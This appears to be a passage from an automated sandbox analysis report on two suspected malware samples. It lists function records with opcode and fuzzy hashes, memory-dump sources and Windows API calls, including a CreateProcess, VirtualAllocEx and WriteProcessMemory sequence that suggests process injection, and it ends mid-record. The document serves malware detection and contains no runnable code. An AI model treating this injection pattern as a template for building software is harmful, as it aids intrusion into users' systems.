                      • Instruction ID: ddd02831750f3db9a8f1195c6c7d072cc6dfed3b048f8f45672da391cbe2bc53
                      • Opcode Fuzzy Hash: 3ea3d2e1c895531fe618b07d7da5bc18a73bb2f9ea866d4edf7a8599d956b5d1
                      • Instruction Fuzzy Hash: 1C1158B5D002088FDB20EFAAC5457EEFBF5EF88314F20881AC519A7250C738A544CBA0
                      APIs
                      • GetModuleHandleW.KERNEL32(00000000), ref: 0137B2C6
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131460876.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1370000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: HandleModule
                      • String ID:
                      • API String ID: 4139908857-0
                      • Opcode ID: 57f48de335a9a6a3954b8c2450941122efd0fb12979fe93c5d7ddbbd0d86e64b
                      • Instruction ID: e31ba794e30feadff621654a480be23493cd15ad80be7bc69156aa4ca4380936
                      • Opcode Fuzzy Hash: 57f48de335a9a6a3954b8c2450941122efd0fb12979fe93c5d7ddbbd0d86e64b
                      • Instruction Fuzzy Hash: 9011FDB58002498FDB20DF9AD448A9EFBF8AF89214F10851AD929A7210D379A545CFA1
                      APIs
                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 013283C5
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131400882.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1320000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: MessagePost
                      • String ID:
                      • API String ID: 410705778-0
                      • Opcode ID: 57c73dd9244e09930a7ecfba5c14b32e50aa69d506445e4342804fb8e71d007b
                      • Instruction ID: 42c9f3a90f67d4dcfa7aaefdb6c1e2c94a3695550f4b34013991167af1994c1e
                      • Opcode Fuzzy Hash: 57c73dd9244e09930a7ecfba5c14b32e50aa69d506445e4342804fb8e71d007b
                      • Instruction Fuzzy Hash: A811F5B58003599FDB10DF9AC484BDEBBF8FB48314F10845AE518A7610C379A944CFA5
                      APIs
                      • GetModuleHandleW.KERNEL32(00000000), ref: 0137B2C6
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131460876.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1370000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: HandleModule
                      • String ID:
                      • API String ID: 4139908857-0
                      • Opcode ID: 018825f28e73508f9b99c4f588474910088a677de85734f7ce01a618909518a1
                      • Instruction ID: 27f7fe86100bfaf2e1cb2e0c2c05ac15adae49d188246efb100f4ad7e4e3e5eb
                      • Opcode Fuzzy Hash: 018825f28e73508f9b99c4f588474910088a677de85734f7ce01a618909518a1
                      • Instruction Fuzzy Hash: 9B110FB5C002498FDB20DF9AC444A9EFBF4AF89214F10851AD918B7210C379A545CFA1
                      APIs
                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 013283C5
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131400882.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1320000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: MessagePost
                      • String ID:
                      • API String ID: 410705778-0
                      • Opcode ID: a004b7576d2c43810775031601a95ff373893ad412d9ef1a63c071a0fb7cefb7
                      • Instruction ID: a600ba137f74a9810e74a040f6cb6015165ac69b3683b0f0ac406cf92f4a5089
                      • Opcode Fuzzy Hash: a004b7576d2c43810775031601a95ff373893ad412d9ef1a63c071a0fb7cefb7
                      • Instruction Fuzzy Hash: 8B1103B58003599FDB10DF9AC885BDEFFF8EB48314F10885AE518A3610D379A544CFA1

                      Execution Graph

                      Execution Coverage:14.2%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:0%
                      Total number of Nodes:30
                      Total number of Limit Nodes:1
                      execution_graph 28881 6976361 28882 69762fc 28881->28882 28883 697636a 28881->28883 28884 697631d 28882->28884 28887 69773f1 28882->28887 28891 6977400 28882->28891 28888 697730f 28887->28888 28888->28887 28889 6977451 28888->28889 28895 6977148 28888->28895 28889->28884 28892 6977448 28891->28892 28893 6977451 28892->28893 28894 6977148 LoadLibraryW 28892->28894 28893->28884 28894->28893 28896 69775f0 LoadLibraryW 28895->28896 28898 6977665 28896->28898 28898->28889 28859 13c0871 28860 13c0889 28859->28860 28863 13c08d8 28859->28863 28868 13c08c8 28859->28868 28864 13c08fa 28863->28864 28873 13c0ce8 28864->28873 28877 13c0ce0 28864->28877 28865 13c093e 28865->28860 28869 13c08d8 28868->28869 28870 13c0ce8 GetConsoleWindow 28869->28870 28871 13c0ce0 GetConsoleWindow 28869->28871 28872 13c093e 28870->28872 28871->28872 28872->28860 28874 13c0d26 GetConsoleWindow 28873->28874 28876 13c0d56 28874->28876 28876->28865 28878 13c0ce8 GetConsoleWindow 28877->28878 28880 13c0d56 28878->28880 28880->28865

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1335 69775e8-6977630 1337 6977632-6977635 1335->1337 1338 6977638-6977663 LoadLibraryW 1335->1338 1337->1338 1339 6977665-697766b 1338->1339 1340 697766c-6977689 1338->1340 1339->1340
                      APIs
                      • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E20,?,?,069774A6), ref: 06977656
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.2258425881.0000000006970000.00000040.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6970000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: LibraryLoad
                      • String ID: ]{3
                      • API String ID: 1029625771-1008762302
                      • Opcode ID: 74b81cd44a01b17e705d486c6aef8a30d6f7108cbe880635e0b59adea884c614
                      • Instruction ID: a6b67fabd909ffd3f77a2c3e99239eeeca56cf5864f66fe3131d01e6c5c70f8d
                      • Opcode Fuzzy Hash: 74b81cd44a01b17e705d486c6aef8a30d6f7108cbe880635e0b59adea884c614
                      • Instruction Fuzzy Hash: EC1114B5C006498FDB10DF9AD444ADEFBF5AB48310F10842AD419A7710D379A546CFA1

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1343 6977148-6977630 1345 6977632-6977635 1343->1345 1346 6977638-6977663 LoadLibraryW 1343->1346 1345->1346 1347 6977665-697766b 1346->1347 1348 697766c-6977689 1346->1348 1347->1348
                      APIs
                      • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E20,?,?,069774A6), ref: 06977656
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.2258425881.0000000006970000.00000040.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6970000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: LibraryLoad
                      • String ID: ]{3
                      • API String ID: 1029625771-1008762302
                      • Opcode ID: 0d748796d32853f4e8bf0353759dc40a7957baf8cfbc135bdae23dfffaaee36f
                      • Instruction ID: cd20d31aa6f2c789d0b35d3387582b44167b7137a91c01451bf1baa18414b252
                      • Opcode Fuzzy Hash: 0d748796d32853f4e8bf0353759dc40a7957baf8cfbc135bdae23dfffaaee36f
                      • Instruction Fuzzy Hash: EA1123B1C007498FDB10DF9AC844A9EFBF8EF89210F14842AD419BB610D379A545CFA5

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1351 13c0ce0-13c0d54 GetConsoleWindow 1355 13c0d5d-13c0d82 1351->1355 1356 13c0d56-13c0d5c 1351->1356 1356->1355
                      APIs
                      • GetConsoleWindow.KERNELBASE ref: 013C0D47
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.2243515684.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_13c0000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: ConsoleWindow
                      • String ID: ]{3
                      • API String ID: 2863861424-1008762302
                      • Opcode ID: f0bd77b35a4dbaa9c41213458e83f87084545d4124399b44cbbe79b47f33b3be
                      • Instruction ID: 87b707547a1f80dcafa727e850d38871d842ae5f69174a5d1912ad065004e6e0
                      • Opcode Fuzzy Hash: f0bd77b35a4dbaa9c41213458e83f87084545d4124399b44cbbe79b47f33b3be
                      • Instruction Fuzzy Hash: 1B1146B58003488FDB24DFAAC4487EEFFF4EF89324F208419D019A7240C739A945CBA0

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1360 13c0ce8-13c0d54 GetConsoleWindow 1363 13c0d5d-13c0d82 1360->1363 1364 13c0d56-13c0d5c 1360->1364 1364->1363
                      APIs
                      • GetConsoleWindow.KERNELBASE ref: 013C0D47
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.2243515684.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_13c0000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: ConsoleWindow
                      • String ID: ]{3
                      • API String ID: 2863861424-1008762302
                      • Opcode ID: 5f180b01401dd62d64219e789904fee4b215b0f36200d01a1ea048f649f0e7f6
                      • Instruction ID: f5692fa480c59a8bcceda2033c47281e844bcdf681cbdc82d4612ffe6f40bd05
                      • Opcode Fuzzy Hash: 5f180b01401dd62d64219e789904fee4b215b0f36200d01a1ea048f649f0e7f6
                      • Instruction Fuzzy Hash: 2C1133B5D002498FDB24DFAAC4497EEFFF4EF48324F20841AD519A7240CB39A944CBA0
                      Memory Dump Source
                      • Source File: 00000008.00000002.2258511269.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_69c0000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6f2d7c844135d8ee3bf9dfdfa951e447a68f96bb478c50680a09c2dcacdfab60
                      • Instruction ID: 1b9a7b8542c633c16941d3594c4598542beaea29b7d6eeca3a0edfdb8c705b52
                      • Opcode Fuzzy Hash: 6f2d7c844135d8ee3bf9dfdfa951e447a68f96bb478c50680a09c2dcacdfab60
                      • Instruction Fuzzy Hash: 0312A970740615CFCB14DF68D840AAE7BB6FF85724F00895CD5029B7A5CBBAED098B92
                      Memory Dump Source
                      • Source File: 00000008.00000002.2258511269.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_69c0000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5f3e1a47771ae3296e8ab859fdcfd01d43ba180152ee5080ae764dd35813be49
                      • Instruction ID: deee456749759d3e64b6d6fa6ba2ed4465599f2d8e927b4886525405d3cd0a45
                      • Opcode Fuzzy Hash: 5f3e1a47771ae3296e8ab859fdcfd01d43ba180152ee5080ae764dd35813be49
                      • Instruction Fuzzy Hash: 3002BD70B40214CFCB14DF68C840AAE7BB6FF85714F108958D9029B7A5CB7AED09CB92
                      Memory Dump Source
                      • Source File: 00000008.00000002.2258511269.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_69c0000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9fd4c818fdeaee708b9cbc5faafc6f2e0730e8733956a67e3c6a972fa32ef463
                      • Instruction ID: 58d1a52d4008e9e5d2e025604430a6fd9c2375fd7936ee6279feeae8ecf37a90
                      • Opcode Fuzzy Hash: 9fd4c818fdeaee708b9cbc5faafc6f2e0730e8733956a67e3c6a972fa32ef463
                      • Instruction Fuzzy Hash: 9EF1CF70B40214CFCB04DF68C851AAE7BB6FF85714F108459D9029B7A5CBBAED05CB92
                      Memory Dump Source
                      • Source File: 00000008.00000002.2258511269.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_69c0000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 26a12529aa9388e65c77fc8895340b74b27a4fe54771cf23e3a31343ea6970a7
                      • Instruction ID: c699ba264e44d08b764d98cb294fc938893304eefe586ad69b2f87a0e7518f9d
                      • Opcode Fuzzy Hash: 26a12529aa9388e65c77fc8895340b74b27a4fe54771cf23e3a31343ea6970a7
                      • Instruction Fuzzy Hash: BDE1E070B40214DFDB00DF68C841A6E7BBAFF85714F108459E9019B7A5CBB6ED05CB92
                      Memory Dump Source
                      • Source File: 00000008.00000002.2258511269.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_69c0000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4c831277a7db751916caf5e663b31398e2ced4b89a20c7e98a30a3a6950ac8ea
                      • Instruction ID: 659bb1c807549c70cd7d937200b365677d723b40b062d3bb7bc62e7c4c48fb9b
                      • Opcode Fuzzy Hash: 4c831277a7db751916caf5e663b31398e2ced4b89a20c7e98a30a3a6950ac8ea
                      • Instruction Fuzzy Hash: FAD1E270B04204DFDB01CF64C855A6A7BBAFF85714F10809AE5019F7A6CBB6DD05CBA2
                      Memory Dump Source
                      • Source File: 00000008.00000002.2258511269.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_69c0000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 94635f8d9b2e237855207928dcb4dea65aa712bd478723ef1ffe906bcfd449f2
                      • Instruction ID: 47c763a7ee89151b18f471ebaf9914a624d977dec02f55a25e877b0048c9d1d4
                      • Opcode Fuzzy Hash: 94635f8d9b2e237855207928dcb4dea65aa712bd478723ef1ffe906bcfd449f2
                      • Instruction Fuzzy Hash: 63C17D38B10114AFCB04DF98C985EADBBB6FF49704F608059F9019B765C672ED09CB66
                      Memory Dump Source
                      • Source File: 00000008.00000002.2258511269.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_69c0000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c1b7afe2bc3735a42d9c9a57eb1f8fb1691c305c1b6e08ffb6949aa4e306c08f
                      • Instruction ID: 37099500667f494b374714a7b00fab21131427f709e42b5b11cf216d8973b836
                      • Opcode Fuzzy Hash: c1b7afe2bc3735a42d9c9a57eb1f8fb1691c305c1b6e08ffb6949aa4e306c08f
                      • Instruction Fuzzy Hash: 1D918D74B102149FCB44CF68C894E9EBBF6FF89710B55C0A9E905AB361DA35EC05CB61
                      Memory Dump Source
                      • Source File: 00000008.00000002.2258511269.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_69c0000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bb77de3ca903504fb92a82ef1e6007eb68f3b724dc99c856667401fae4ba49ec
                      • Instruction ID: 58f5166e816998a5e5184a09431dba3788ec12c1333fb432b3ef850acbe53e7a
                      • Opcode Fuzzy Hash: bb77de3ca903504fb92a82ef1e6007eb68f3b724dc99c856667401fae4ba49ec
                      • Instruction Fuzzy Hash: 4D514935B002058FCB549F6DD89057ABBF9EFC6220B24857ED845C7A22EF31C846C7A6
                      Memory Dump Source
                      • Source File: 00000008.00000002.2243163126.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_131d000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 92bfb308a43eeca1af6b2f2737f0a6792e17cc137d0f3a2150796deb5137b864
                      • Instruction ID: 7ff5712458ba73e79ebfc06ff445a8c1134a5245158e228075d0d287765a053e
                      • Opcode Fuzzy Hash: 92bfb308a43eeca1af6b2f2737f0a6792e17cc137d0f3a2150796deb5137b864
                      • Instruction Fuzzy Hash: 95213D71500244DFCF19DF54D9C4F16BF65FB89318F24C569E9090B25AC33AD416CBA1
                      Memory Dump Source
                      • Source File: 00000008.00000002.2243215327.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_132d000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8395dca8f96635b7146b3f75af126e5495abfefc39eabf4e948b82a430a29d2d
                      • Instruction ID: 081cbecc21b21d591e2341fe8c86db16f5710f759d05802ef05b0b9e28139f84
                      • Opcode Fuzzy Hash: 8395dca8f96635b7146b3f75af126e5495abfefc39eabf4e948b82a430a29d2d
                      • Instruction Fuzzy Hash: 90210471504204EFDB05EFA8D9C4F26BB69FB8831CF20C96DD9094B356C77AE406CA62
                      Memory Dump Source
                      • Source File: 00000008.00000002.2243215327.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_132d000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1a13eaf1286f880a964feb82b31182bb0b1775bad6ad034c9eaac2011582a0d4
                      • Instruction ID: 0453c3c53b9ea0008f6352c04c386dc1d684aeb4d8e0434d3d9ad654ec264127
                      • Opcode Fuzzy Hash: 1a13eaf1286f880a964feb82b31182bb0b1775bad6ad034c9eaac2011582a0d4
                      • Instruction Fuzzy Hash: B7213571504204DFDB05EF98D9C0B2ABF69FB88328F24C56DDA494B346C33AD406CAB2
                      Memory Dump Source
                      • Source File: 00000008.00000002.2243163126.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_131d000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b4df52cb15700b59c5b6b401fa95ea1d4e97f6e18881beb99e30f99f1fcf6035
                      • Instruction ID: e6f5dd29c2e9075d641d090c1815face063d3af5404869de83ae57f3da9fba9d
                      • Opcode Fuzzy Hash: b4df52cb15700b59c5b6b401fa95ea1d4e97f6e18881beb99e30f99f1fcf6035
                      • Instruction Fuzzy Hash: 5121C072404280DFCB06CF54D9C4B16BF72FB89314F2486A9D9480A25BC33AD416CB91
                      Memory Dump Source
                      • Source File: 00000008.00000002.2243215327.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_132d000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 58489c3f61924d27558184a5eb21aea17821769c0c96028cc0fb4c2ef8240ab9
                      • Instruction ID: 15bdc69f89d64f112b4e71e270598e2a20490498e9deea9dee6d63550fb30c06
                      • Opcode Fuzzy Hash: 58489c3f61924d27558184a5eb21aea17821769c0c96028cc0fb4c2ef8240ab9
                      • Instruction Fuzzy Hash: 0111BF76504280CFDB12DF14D5C4B19FF61FB84328F28C6AAD9494B656C33AD44ACBA2
                      Memory Dump Source
                      • Source File: 00000008.00000002.2243215327.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_132d000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                      • Instruction ID: 4aa49c37c137af173c4f91e179d52c834d4a574ca2d4793d353b7bfe3fde5ea2
                      • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                      • Instruction Fuzzy Hash: A911DD75504280CFDB02DF54C5C4B15BFB1FB88318F24C6AAD8494B256C37AD40ACB62
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.2258511269.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_69c0000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                      • API String ID: 0-1273862796
                      • Opcode ID: 62a7a0b37ca0d2b800c5facf19cab45eef51430f206f5f442cf62a732208e63b
                      • Instruction ID: 457aace904564bac7855afc758685f6a495e4aa8b9818dd1503b6a1c1ef5a382
                      • Opcode Fuzzy Hash: 62a7a0b37ca0d2b800c5facf19cab45eef51430f206f5f442cf62a732208e63b
                      • Instruction Fuzzy Hash: C0B1AD30B00245CFDB55CB69C9549AEBBF6BF89220F14846EE406D77A1CB35DC45CBA2

                      Execution Graph

                      Execution Coverage:10.7%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:0%
                      Total number of Nodes:204
                      Total number of Limit Nodes:16

                      Control-flow Graph

                      APIs
                      • GetCurrentProcess.KERNEL32 ref: 013BD37E
                      • GetCurrentThread.KERNEL32 ref: 013BD3BB
                      • GetCurrentProcess.KERNEL32 ref: 013BD3F8
                      • GetCurrentThreadId.KERNEL32 ref: 013BD451
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2215625375.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_13b0000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: Current$ProcessThread
                      • String ID:
                      • API String ID: 2063062207-0

                      Control-flow Graph

                      APIs
                      • GetCurrentProcess.KERNEL32 ref: 013BD37E
                      • GetCurrentThread.KERNEL32 ref: 013BD3BB
                      • GetCurrentProcess.KERNEL32 ref: 013BD3F8
                      • GetCurrentThreadId.KERNEL32 ref: 013BD451
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2215625375.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_13b0000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: Current$ProcessThread
                      • String ID:
                      • API String ID: 2063062207-0

                      Control-flow Graph

                      APIs
                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 03053C16
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2216939833.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_3050000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0

                      Control-flow Graph

                      APIs
                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 03053C16
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2216939833.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_3050000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0

                      APIs
                      • GetModuleHandleW.KERNELBASE(00000000), ref: 013BB2C6
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2215625375.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_13b0000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: HandleModule
                      • String ID:
                      • API String ID: 4139908857-0
                      • Opcode ID: 32f316e3082e6d51aa0ec7885b304157261ec4ce21f813d2ac3a7be28567176e
                      • Instruction ID: 8caceb8f5cbddd5eda96bef20d5ae54b7d53af58522520a92712abd6d0dd9404
                      • Opcode Fuzzy Hash: 32f316e3082e6d51aa0ec7885b304157261ec4ce21f813d2ac3a7be28567176e
                      • Instruction Fuzzy Hash: 29716670A00B058FD724DF2AD5807AABBF5FF88304F00892DD54ADBA44EB75E949CB90

                      APIs
                      • CreateActCtxA.KERNEL32(?), ref: 013B59C9
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2215625375.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_13b0000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: Create
                      • String ID:
                      • API String ID: 2289755597-0
                      • Opcode ID: bf1dcdc6cf8586069dc28ab76b53694d4cb5bb8710efccea14aed9f97dacd2d4
                      • Instruction ID: 654e5d89c94a9e0a03984e24e277af2340c334e926bc3c3734a84586bbcafc3c
                      • Opcode Fuzzy Hash: bf1dcdc6cf8586069dc28ab76b53694d4cb5bb8710efccea14aed9f97dacd2d4
                      • Instruction Fuzzy Hash: 0041EDB0C0071DCBDB24CFA9C884ADDBBB5BF49308F20806AD508BB255EB756946CF90

                      APIs
                      • CreateActCtxA.KERNEL32(?), ref: 013B59C9
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2215625375.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_13b0000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: Create
                      • String ID:
                      • API String ID: 2289755597-0
                      • Opcode ID: cdf3893d1a8c2667e950eee258962eb7a591e01e5bd35d6c1e6f6021dc3584a7
                      • Instruction ID: 005d8855e9910d786bfc10cef73c7909fdcf3d639bfbcb10b4222516bb190b2e
                      • Opcode Fuzzy Hash: cdf3893d1a8c2667e950eee258962eb7a591e01e5bd35d6c1e6f6021dc3584a7
                      • Instruction Fuzzy Hash: 6E41EEB0C00659CFDB25CFA9C885BDDBBB1BF49308F24806AD508BB255DB75694ACF90

                      APIs
                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 03053706
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2216939833.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_3050000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: b140e28da616e66f229ee727af9201445ada7e80579e00bb4613ab152c6f1ea0
                      • Instruction ID: 6a119c87d8dd6ce9379af4226adcac40fb681c78dd68b3bd02e5f340e3e38349
                      • Opcode Fuzzy Hash: b140e28da616e66f229ee727af9201445ada7e80579e00bb4613ab152c6f1ea0
                      • Instruction Fuzzy Hash: C5214AB69002099FCB20DFA9D8457EEFFF5EF88320F24841AE519A7250CB399541CFA0

                      APIs
                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 030537E8
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2216939833.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_3050000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: MemoryProcessWrite
                      • String ID:
                      • API String ID: 3559483778-0
                      • Opcode ID: 5bd39f4b0c7409ed2ac5597b751413329dc033ccc9421922e978e2709bb81dda
                      • Instruction ID: 3bf5655d2df6abe97405e6a4c2ef6587e42b9fd8af3382d2fd8363c215a8c22f
                      • Opcode Fuzzy Hash: 5bd39f4b0c7409ed2ac5597b751413329dc033ccc9421922e978e2709bb81dda
                      • Instruction Fuzzy Hash: 5E2135B5D002099FCB10CFA9C881BEEBBF1FF48310F10852AE918A7240D7799945CFA0

                      APIs
                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 030537E8
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2216939833.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_3050000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: MemoryProcessWrite
                      • String ID:
                      • API String ID: 3559483778-0
                      • Opcode ID: 4a73021dd8472ae211d7af40e3e2256751ff0331c0e7b1c27981d24665f9ca85
                      • Instruction ID: 6a306c5a0737989cf56c1f67e5e37ca8dc6ce3766f7c540bd115d61ab81cb358
                      • Opcode Fuzzy Hash: 4a73021dd8472ae211d7af40e3e2256751ff0331c0e7b1c27981d24665f9ca85
